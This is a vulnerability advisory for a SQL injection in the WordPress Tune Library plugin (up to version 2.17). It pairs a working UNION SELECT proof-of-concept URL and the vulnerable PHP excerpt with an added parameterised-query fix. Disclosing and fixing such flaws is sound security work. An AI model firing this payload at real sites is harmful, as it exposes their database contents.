WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability


PoC

http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20

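----------
Vulnerable code
----------
// The request parameter is read without validation or escaping.
$artistletter = $_GET['letter'];

if ($options['oneletter'] == false || $showallartists == true)

else
{
    if ($artistletter == '#')
    …
    else
    {
        // $artistletter is concatenated directly into the LIKE clause, so a quote in it ends the string literal.
        $querystr = "SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" . $artistletter . "%' order by artist";
    }
}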
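
A hardened form of the query above, as an added example that is not the plugin's own code or its actual fix. The helper name tl_artists_by_letter is hypothetical, and the code assumes WordPress 4.0 or later is loaded so that $wpdb->prepare() and $wpdb->esc_like() are available; the elided '#' branch is not covered.

```php
<?php
// Added example (not from the plugin): validate the letter, then bind it
// as a parameter instead of concatenating it into the SQL string.

/**
 * Hypothetical helper: artists whose name starts with the given letter.
 * Returns an empty array for anything that is not one letter or digit.
 */
function tl_artists_by_letter( $raw_letter ) {
    global $wpdb;

    // ?letter[]=x would arrive as an array; only strings are accepted.
    if ( ! is_string( $raw_letter ) ) {
        return array();
    }

    // Remove the slashes WordPress adds to request data, keep one character.
    $letter = mb_substr( wp_unslash( $raw_letter ), 0, 1 );

    // Allow-list: exactly one Unicode letter or digit.
    if ( ! preg_match( '/^[\p{L}\p{N}]$/u', $letter ) ) {
        return array();
    }

    // The table name comes from site configuration, not from the request.
    $table = $wpdb->prefix . 'tracks';

    // esc_like() neutralises % and _ so they are not LIKE wildcards;
    // prepare() quotes the value as a string literal for the %s placeholder.
    $pattern = $wpdb->esc_like( $letter ) . '%';
    $sql     = $wpdb->prepare(
        "SELECT DISTINCT artist, 'artist' AS source
           FROM {$table}
          WHERE artist != '' AND artist LIKE %s
          ORDER BY artist",
        $pattern
    );

    return $wpdb->get_results( $sql );
}

// Usage in the AJAX handler: the raw parameter never reaches the SQL text.
$rows = tl_artists_by_letter( isset( $_GET['letter'] ) ? $_GET['letter'] : '' );
```

With this form the PoC value is cut to its first character and rejected by the allow-list before any query is built.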
